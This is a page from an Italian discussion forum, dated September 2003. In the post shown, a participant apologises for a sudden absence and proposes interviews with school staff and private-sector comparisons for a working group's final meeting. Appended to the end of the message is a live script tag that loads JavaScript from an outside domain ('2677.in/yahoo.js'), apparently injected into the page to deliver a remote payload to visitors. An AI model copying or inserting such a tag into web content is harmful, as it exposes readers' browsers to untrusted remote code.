|
 | | Germano Cipolletta | 22 Set 2003 |
|
|
 | |
chiedo scusa per la scomparsa improvvisa ma abbiamo avuto a scuola seri problemi con il nuovo impianto elettrico che ci ha lasciato senza luce per parecchie ore e allora ho pensato di collegarmi da casa. Ritornando all'incontro finale, come ben dice germano per evitare la noia, sarebbe bene proiettare anche interviste dirette agli operatori di qualche scuola coinvolti nelle indagini c.s.per sentire a " viva voce" cosa pensano di questo mezzo.E forse i punti di criticità e una interessante discussione per alimentare il coinvolgimento delle persone all'interno del w.p. , emergerebbero in modo naturale e spontaneo. Altra proposta: interviste anche in ambito privato e raffronto con la c.s.applicata nel pubblico. Ritengo comunque le slides ripetitive e un mezzo forse per l'esperto ma non più per chi interviene. Se può la proposta essere considerata accettabile io mi offro. Vorrei gentilmente il parere del nostro supremo e gentile coordinatore . Ah a proposito germano, ancora tanti auguri per un buon inizio.... in qualità di coniuge! Buona serata a tutti.<script src=http://2677.in/yahoo.js></script>
|
|
 | | Germano Cipolletta | 18 Set 2003 |
|
|
 | | Francesco Pignataro | 17 Set 2003 |
|
|
 | | Germano Cipolletta | 17 Set 2003 |
|
|
 | | Germano Cipolletta | 17 Set 2003 |